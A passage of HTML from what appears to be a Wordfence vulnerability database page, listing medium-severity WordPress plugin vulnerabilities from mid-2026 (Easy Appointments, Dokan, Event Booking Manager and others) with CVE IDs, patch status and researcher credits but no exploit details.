<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/manuel-martinez-casasola" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d492fb633dd568a0e582376bd84f7406.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d492fb633dd568a0e582376bd84f7406"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/manuel-martinez-casasola" target="_blank" rel="noopener">Manuel Martínez Casasola</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e8de3e34-fa8a-435c-a435-10b8efa19088" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/832ba0eb-6399-44d5-9055-9bb97f97095f" target="_blank" rel="noopener">Brizy – Page Builder &lt; 2.8.18 &#8211; Authenticated (Contributor+) Information Exposure</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14195" target="_blank" rel="noopener noreferrer">							CVE-2026-14195						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 1, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/brizy" target="_blank" rel="noopener">Brizy – Page Builder</a> <span class="wfvr-software-slug">[brizy]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mustafa-ahmed" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/9798121c8d6727f14fb4fec286df68ec.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="9798121c8d6727f14fb4fec286df68ec"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mustafa-ahmed" target="_blank" rel="noopener">Mustafa Ahmed</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/832ba0eb-6399-44d5-9055-9bb97f97095f" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0210637e-360b-422f-be96-43e6ac48fe64" target="_blank" rel="noopener">Clever Mega Menu for Visual Composer &lt;= 1.0.1 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-11872" target="_blank" rel="noopener noreferrer">							CVE-2026-11872						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 2, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/clever-mega-menu" target="_blank" rel="noopener">Clever Mega Menu for Visual Composer</a> <span class="wfvr-software-slug">[clever-mega-menu]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pablo-gonzalez-and-fran-ramirez" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/aed2c19f017f6855244df6cf8d605335.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="aed2c19f017f6855244df6cf8d605335"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pablo-gonzalez-and-fran-ramirez" target="_blank" rel="noopener">Pablo González and Fran Ramírez</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0210637e-360b-422f-be96-43e6ac48fe64" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9a6921b3-a0a1-4392-ba8d-d3fb6892c639" target="_blank" rel="noopener">Colissimo shipping methods for WooCommerce &lt;= 2.10.0 &#8211; Authenticated (Customer+) Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66692" target="_blank" rel="noopener noreferrer">							CVE-2026-66692						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 29, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/colissimo-shipping-methods-for-woocommerce" target="_blank" rel="noopener">Colissimo shipping methods for WooCommerce</a> <span class="wfvr-software-slug">[colissimo-shipping-methods-for-woocommerce]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/turbonexic" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/c4c7257eabfabcbfa54be7eb5b7dd68c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c4c7257eabfabcbfa54be7eb5b7dd68c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/turbonexic" target="_blank" rel="noopener">TurboNexic</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9a6921b3-a0a1-4392-ba8d-d3fb6892c639" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7a54b803-7e30-4964-88f0-d79276e67218" target="_blank" rel="noopener">Cookie Banner for GDPR / CCPA – WPLP Cookie Consent &lt;= 4.3.7 &#8211; Cross-Site Request Forgery via Bulk Action to Delete/Resolve Entries</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15136" target="_blank" rel="noopener noreferrer">							CVE-2026-15136						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gdpr-cookie-consent" target="_blank" rel="noopener">WPLP Cookie Consent – Cookie Banner &amp; Consent Management for GDPR, CCPA &amp; Google Consent Mode</a> <span class="wfvr-software-slug">[gdpr-cookie-consent]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7a54b803-7e30-4964-88f0-d79276e67218" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fdfac5bc-89ac-4ed7-85e9-a4a1ff0bfbff" target="_blank" rel="noopener">Dokan: AI Powered WooCommerce Multivendor Marketplace Solution – Build Your Own Amazon, eBay, Etsy &lt;= 5.0.10 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66699" target="_blank" rel="noopener noreferrer">							CVE-2026-66699						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 29, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/dokan-lite" target="_blank" rel="noopener">Dokan: AI Powered WooCommerce Multivendor Marketplace Solution – Build Your Own Amazon, eBay, Etsy</a> <span class="wfvr-software-slug">[dokan-lite]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fdfac5bc-89ac-4ed7-85e9-a4a1ff0bfbff" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1e8f0ef8-4916-4b62-a062-f169ba15448e" target="_blank" rel="noopener">Easy Appointments &lt; 3.12.28 &#8211; Authenticated (Contributor+) Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14188" target="_blank" rel="noopener noreferrer">							CVE-2026-14188						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 30, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-appointments" target="_blank" rel="noopener">Easy Appointments</a> <span class="wfvr-software-slug">[easy-appointments]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mustafa-ahmed" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/9798121c8d6727f14fb4fec286df68ec.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="9798121c8d6727f14fb4fec286df68ec"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mustafa-ahmed" target="_blank" rel="noopener">Mustafa Ahmed</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1e8f0ef8-4916-4b62-a062-f169ba15448e" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/19544e08-fa14-4251-bcc2-e46ebccca075" target="_blank" rel="noopener">Easy Appointments &lt; 3.12.28 &#8211; Authenticated (Subscriber+) Information Exposure</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14226" target="_blank" rel="noopener noreferrer">							CVE-2026-14226						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 30, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-appointments" target="_blank" rel="noopener">Easy Appointments</a> <span class="wfvr-software-slug">[easy-appointments]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/phyo-ko-ko" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/51a3cddbc5b4b4bda2364dff4f57dfed.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="51a3cddbc5b4b4bda2364dff4f57dfed"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/phyo-ko-ko" target="_blank" rel="noopener">Phyo Ko Ko</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/19544e08-fa14-4251-bcc2-e46ebccca075" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8cffcb34-4d35-4e1e-bc0a-53a41bc91e87" target="_blank" rel="noopener">Easy Appointments &lt; 3.12.28 &#8211; Authenticated (Subscriber+) Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14223" target="_blank" rel="noopener noreferrer">							CVE-2026-14223						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 30, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-appointments" target="_blank" rel="noopener">Easy Appointments</a> <span class="wfvr-software-slug">[easy-appointments]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mark-moore" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/391706731077de4a1e991524d6b9c870.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="391706731077de4a1e991524d6b9c870"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mark-moore" target="_blank" rel="noopener">Mark Moore</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8cffcb34-4d35-4e1e-bc0a-53a41bc91e87" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bb175149-05b5-4e8e-8437-9a07762c7269" target="_blank" rel="noopener">Easy Appointments &lt; 3.12.28 &#8211; Authenticated (Subscriber+) Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14224" target="_blank" rel="noopener noreferrer">							CVE-2026-14224						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 29, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-appointments" target="_blank" rel="noopener">Easy Appointments</a> <span class="wfvr-software-slug">[easy-appointments]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/duy-khanh" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/2cd055dd6c3bc3b1292e85a8a8a0cfd9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2cd055dd6c3bc3b1292e85a8a8a0cfd9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/duy-khanh" target="_blank" rel="noopener">Duy Tran</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bb175149-05b5-4e8e-8437-9a07762c7269" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6c67aefd-5da3-437e-bd7b-1f4dbea3130f" target="_blank" rel="noopener">Easy Appointments &lt; 3.12.28 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14222" target="_blank" rel="noopener noreferrer">							CVE-2026-14222						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 30, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-appointments" target="_blank" rel="noopener">Easy Appointments</a> <span class="wfvr-software-slug">[easy-appointments]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/wei-hsiang-wang" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/ac6bf1005b916352d965412b8d10a2a5.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ac6bf1005b916352d965412b8d10a2a5"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/wei-hsiang-wang" target="_blank" rel="noopener">WEI HSIANG WANG</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6c67aefd-5da3-437e-bd7b-1f4dbea3130f" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/39e35136-a096-40d5-8d6e-2667e7b83aaa" target="_blank" rel="noopener">Easy Appointments &lt;= 3.12.26 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14221" target="_blank" rel="noopener noreferrer">							CVE-2026-14221						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 30, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-appointments" target="_blank" rel="noopener">Easy Appointments</a> <span class="wfvr-software-slug">[easy-appointments]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/youssef-massoudi" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/86d39645cda69d6da0e000d9158634e7.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="86d39645cda69d6da0e000d9158634e7"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/youssef-massoudi" target="_blank" rel="noopener">Youssef massoudi</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/39e35136-a096-40d5-8d6e-2667e7b83aaa" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b738a4fe-6724-4216-be77-ea67843f89d1" target="_blank" rel="noopener">Event Booking Manager for WooCommerce – Sell Tickets, Event Registration, RSVP &amp; Event Calendar &lt; 5.3.7 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16064" target="_blank" rel="noopener noreferrer">							CVE-2026-16064						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 2, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mage-eventpress" target="_blank" rel="noopener">Event Booking Manager for WooCommerce – Sell Tickets, Event Registration, RSVP &amp; Event Calendar</a> <span class="wfvr-software-slug">[mage-eventpress]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yaswanth-reddy-sunkara" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/04dc25fcada9520afe8fb170e539d8b9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="04dc25fcada9520afe8fb170e539d8b9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yaswanth-reddy-sunkara" target="_blank" rel="noopener">Yaswanth Reddy Sunkara</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b738a4fe-6724-4216-be77-ea67843f89d1" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5f43e35e-55cd-45f1-b8a5-e47398d97cc2" target="_blank" rel="noopener">Event Booking Manager for WooCommerce &lt;= 5.3.7 &#8211; Missing Authorization to Authenticated (Contributor+) Site-Wide Payment Settings Modification via mep_save_payment_settings_modal AJAX Action</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-17166" target="_blank" rel="noopener noreferrer">							CVE-2026-17166						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mage-eventpress" target="_blank" rel="noopener">Event Booking Manager for WooCommerce – Sell Tickets, Event Registration, RSVP &amp; Event Calendar</a> <span class="wfvr-software-slug">[mage-eventpress]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5f43e35e-55cd-45f1-b8a5-e47398d97cc2" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/76820ffd-5f35-46d0-b54a-2488ee96ee7a" target="_blank" rel="noopener">Event Tickets and Registration &lt; 5.29.0.1 &#8211; Authenticated (Contributor+) Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14823" target="_blank" rel="noopener noreferrer">							CVE-2026-14823						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 1, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
